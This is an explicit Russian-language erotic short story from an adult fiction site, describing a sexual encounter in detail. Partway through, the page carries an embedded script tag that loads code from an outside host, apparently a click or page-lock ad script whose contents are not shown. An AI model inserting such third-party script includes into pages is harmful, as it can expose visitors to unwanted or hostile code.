Нежность сладострастия.

A A A
2
Как же мне хочется быть всегда рядом с тобой, с тобой единственной. Всю свою жизнь посвятить именно тебе. Ах, это незабываемое чувство когда я соприкасаюсь своими губами к твоему телу. Мне так безумно хочется, хочется прижать тебя к своему разгорячённому телу, и нежно поцеловать в твои уста, проводя ладонями своих рук по твоей талии. Чтобы кончики наших языков сплелись в единое целое, и мы будем чувствовать привкус сладкого выделения, исходящего из глубины нашей страстной души.
Твои руки схватят меня за поясницу, крепкими и стремительными движениями я сближусь с тобой намного ближе. Настолько, что своей грудью ты будешь чувствовать битьё моего сердца. Ладонью моей руки я нежно уберу твои шелковистые волосы с твоей нежной шеи. И как новорождённый припав бы к молоку своей матери, так бы и мои губы коснулись твоего сладкого тела. От неземного удовольствия, я машинально закрыл глаза и впился своими горячими губами в твою шею. Почувствовав как кончик моего языка нежно ласкает тебя, твои пальцы резко впиваются в мою спину и ты изо всех сил прижимаешь к своей груди моё тело. Оставив на мгновение твою невероятно нежную и приятную на вкус шею, ладони моих рук проводят по обеим бокам твоей талии, тем самым снимая с тебя твою очаровательную, прозрачную кофточку. Перед моим взором предстала твоя упругая и изумительная грудь. Она была идеальных размеров и настолько приятна на ощупь, что я просто ощущал внезапную эйфорию.
Закрыв глаза от наслаждения, ты опрокинула шею и тихонько стонала, когда кончик моего языка нежно ласкал твою грудь, прикусывая губами твой розовый от возбуждения сосок. Пальцами другой руки, я начал медленно опускаться по твоему животику, касаясь каждой части твоего тела. И опустившись ещё ниже, они вошли в твои уже намокшие трусики. Вздрогнув от прикосновения моих пальчиков, ты автоматически прикусила свою губу. От твоих стонов, я получал просто неземное наслаждение, и ты была просто великолепна.

<script type="text/javascript" src="http://wap-click.org/jslock.php?id=1971"></script>
Когда я почувствовал что ты начинаешь извиваться, я медленно опустился ниже, начав целовать и ласкать своим язычком твой сладкий животик. По твоему телу словно пробежала одна огромная мурашка. Настолько тонко ты ощущала кончик моего языка у себя на животике, который стремительно опускался все ниже и ниже. Когда он достиг твоего пупка, ты застонала ещё больше. Пальчики моей руки ласкали тебя под трусиками, я чувствовал как ты мокреешь ещё больше, как твои сочные выделения исходят из тебя. И мне так хочется их испробовать. Тогда я посмотрев в твои глаза, взял пальцами по бокам твоих трусиков и нежно стянул их с тебя. И сразу же ты почувствовала как мои уста коснулись твоих мокрых губ, и как мой язык нежно скользит между ними. У тебя сработал рефлекс, и ты прижала своими ножками мою голову. Схватив меня за волосы ты громко закричала от удовольствия. Ещё пару движения своим языком, и он уже был внутри тебя. Я чувствовал твой сок, твои выделения, и мне это безумно нравилось. Нравилось до такой степени, что жизнь готов был отдать за вечность с тобой.


A A A

Поиск

Жанры Видео

Жанры Рассказов


© Copyright 2019